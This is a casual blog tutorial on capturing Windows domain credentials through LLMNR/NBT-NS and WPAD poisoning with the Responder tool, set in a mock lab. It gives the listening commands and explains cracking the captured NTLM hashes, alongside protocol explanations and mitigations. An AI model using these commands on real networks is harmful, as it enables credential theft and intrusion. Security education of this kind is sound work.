Billions of machines, spanning all industries, run Windows across the world. Most of your average computer users use Windows. It doesn't take any knowlege of commands for a terminal, people can look at pretty pictures, and they don't have to think about anything except for the task they want to complete. Though very user friendly, it is littered with small vulnerabilities that have been around for quite some time. Today, I'll be going into some of the ways one can escalate their privileges in Windows Environments, including active directory. If you work in some sort of offensive security role, than you should understand how to privilege escalate on Windows as you will come across it eventually, if you haven't already. For those not in Cyber Security, no worries! Just don't browse to random websites or watch porn at work and we'll call it good enough. Given that it has so many vulnerabilities, it is a large target for malware. Windows has the highest user count, the most critical infrastructure, and the most mis-configurations by admins. I have literally zero stats to back that up, but since over 2 billion machines in the world run Windows, I could definitely believe those statements (LOL).
Initially, let's talk about Active Directory (AD). Large enterprise and businesses run on AD. It's a great solution for security and permissions administration since it can handle such large scale networks that may span large geographic areas if need be. "Active Directory uses a structured data store as the basis for a logical, hierarchical organization of directory information(WindowsInternals)." So what does this mean? It means we can administer user accounts and computer accounts with Active Directory Domain Services on your Windows Server operating systems. Now i'm not going to give a full class on AD, but you will need to know how a domain is structured in order for this to make sense. For that, you can dig into the Windows Internals book by Mark Russinovich to learn everything you need to know about Windows. Honestly, it will open your eyes to how complex Windows can get. Every user account in the domain (not local accounts), every shared folder, every DNS resolution needs to go through a domain controller in a domain. The domain controller is a server that handles all authentication and objects within a domain. Awesome, we have a target that most attackers want gain control of. Since the domain controller stores sensitive information on the network (User creds), if we achieve control of it, we can move anywhere in the domain with access to most, if not all, information. We have a light base, now let's talk about some of the services AD uses to do tasks like file sharing and name resolution:
Kerberos - For authentication using tickets
SMB - File transfers/sharing
NFS - Network File System for distributed file systems
LLMNR - Link Local Multicast Name Resolution, quick name resolution for hosts on the same network
WPAD - Web Proxy Auto Discovery uses DHCP or DNS to resolve URLs (typically turned off since it has horrible vulnerabilities, but you may get lucky)
NBT-NS - NetBIOS Name Service - host discovery by NetBIOS name
In this article, I'm just going to touch on LLMNR/NBT-NS poisoning. For a further description check out Mitre's ATT&CK: https://attack.mitre.org/techniques/T1171/. I'll be using the tool responder since it has tools specifically for this and makes the process extremely simple. Now, to do this attack I built a mock AD domain with a whopping one user, so as you can imagine, in a real network there's a lot more traffic flying around that may make this a bit more noisy or difficult based on how many poisoned responses go out. Remember, the goal on offense is to stay low and move slow.
Imagine you're a user and you need to connect to a particular fileshare. We'll say its name is "filepath." "Oh nice, let me just type that in to the filepath search bar and ... wait. Is the share called filepath or fileshare?"
I, the attacker, have already gained initial access to the network somehow and am patiently waiting as responder runs with "responder -I eth0" to listen on the eth0 interface
Noice! Responder picked up the request for a filepath that didn't resolve over LLMNR then responded saying that it knew where the file share was, so the host should send it's credentials to us. Alright, one step back. What is supposed to happen? The target is sending a request to the server asking if any servers know where that file share is. The DNS server is supposed to respond saying it hasn't seen it, so the target then broadcasts across the network asking if anyone else has seen where that file share is. We step in and say, "Yes, I have that good good you're looking for, send them creds BB and i'll give you the hook up." The target then says, "I certainly will! Here is my username and password!" Thus we are given the NTLM Hash for their password. But Brian, what is an NTLM hash? Well NTLM stands for New Technology Lan Manager, the successor to the Lan Manager. It's a challenge-response authentication protocol specific to Windows that works in 7 steps:
1.) User enters credentials and machine computes hash for password, discarding original password
2.) The client machine sends username to the server to check if they exist
3.) The server generates a nonce (challenge) and fires it back to the client
4.) The client encrypts the nonce with the hash of the user's password the returns it to the server as a response
5.) The server sends the username, nonce, and response over to the DC
6.) The DC then uses the username to retrieve the password hash from the SAM (Security Account Manager database) and encrypts the nonce with the known password hash
7.) Finally the DC compares the nonce it created to the nonce it received to distinguish if the password the user entered is correct.
This is all sent over the network in plain text (minus the nonce) where anyone on the network can see what's going on. In modern day, Kerberos is used over NTLM, but NTLM is still supported and must be used for logon authentication on stand alone systems. It can still be supported as a sub-protocol of Kerberos which is the reason we still see these hashes flying around as they are used to check if a user has privileges to access certain network resources. Kerberos is going to be another article for later since that is a beast of its own, pun intended. This information came straight from MSDN: https://docs.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm. Nice, so we have a password hash, what now? The obvious answer is crack it. John or Hashcat are the more commonly used tools. You're hardware and wordlists will determine how much time this cracking will take.
This was pretty quick, but I also cherry picked the passwords for my wordlists. Typically, offensive teams have extremely "beefy" hardware for password cracking with massive wordlists, so the cracking isn't a major hurdle. To fix this, just disable LLMNR with a GPO (Group Policy Object).
Good job team, let's try a different approach. This time we'll attack the WPAD protocol
Imagine you're a user and you want to browse to a new website the network hasn't seen before. We'll say its name is "bing.com." "Oh nice, let me just type that in to the URL search bar and ... wait. Why do I have to login?"
"Hmm ok, seems legit. Just another authentication box, let me enter my user:pass in like usual." BOOM! User is de... I mean compromised.
I ran "responder -I eth0 -wF" for this. "-w" starts a rogue proxy server then "F" forces NTLM/Basic authentication wpad.dat file retrieval. It doesn't always cause a login prompt, but for us it did. Alright, what is WPAD and how does it work? "Applications and components that use WinHTTP to send HTTP requests should ensure that the proxy configuration is set correctly(MSDN)." Web Proxy Auto Discovery (WPAD) does this automatically and works in 4 steps:
1.) Using DHCP or DNS, the Proxy Auto-Config (PAC) file is found/discovered on the network.
2.) The PAC file is downloaded and optionally cached on the client's machine. The PAC file generates a list of proxy servers given a target host and URL.
3.) Then, for each HTTP request, the PAC script is executed with the host name and URL of the HTTP request passed in as parameters. Within that script, the FindProxyForURL(URL, host) method is called.
4.) The list of usable proxy servers is generated once those proxy servers are found. If the client can hit the server of the URL without using a proxy server (i.e on the same network) it returns a special value for that.
This information was also retrieved from MSDN: Our poisoned WPAD Proxy is created with responder and responds to the host when it starts to ask what Proxy servers can be used for it's outgoing HTTP Request. We, as the attacker, send the host a malicious WPAD.dat file where the host then believes that we are the primary proxy server. Nice we now have access to all HTTP traffic now, but also the client has to authenticate with us meaning we can grab them sweet creds.
According to microsoft, this vulnerability affects all machines with OS of Windows Vista to Windows 10 version 1511 and all machines with the OS Windows Server 2008 to Windows Server 2012 R2. The affected versions were put out by Microsoft in a bulletin here: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077. To stop this vulnerability, an admin can just turn off autoproxy discovery and hard code what proxies to use. On top of this, that same admin should just update their server to Windows Server 2019.
These two attacks are at the more basic-intermediate level of offensive security. LLMNR comes enabled by default on Windows Vista and later hence why it can be a quick target if found running. WPAD, though older, can still be relevant because not every company has the money upgrade. Not every company is going to have competent System Administrators either. Attackers prey on these oversights.
Responder is also a great suite of tools, but as always, you should know both your target and tools very well. There really shouldn't be much guessing at all of whether or not your attack is going to work because you should have a deep understanding of the full situation. If you're guessing, you're flirting with getting compromised.
On a final note, this is looking like the start of a Windows series. Everyone cracks Windows for being "easy" because it's cool, but when it comes time to tote guns, peeps can't pull the trigger. Respect and study your opponents, right? Every network is unique. Stay fresh, homies.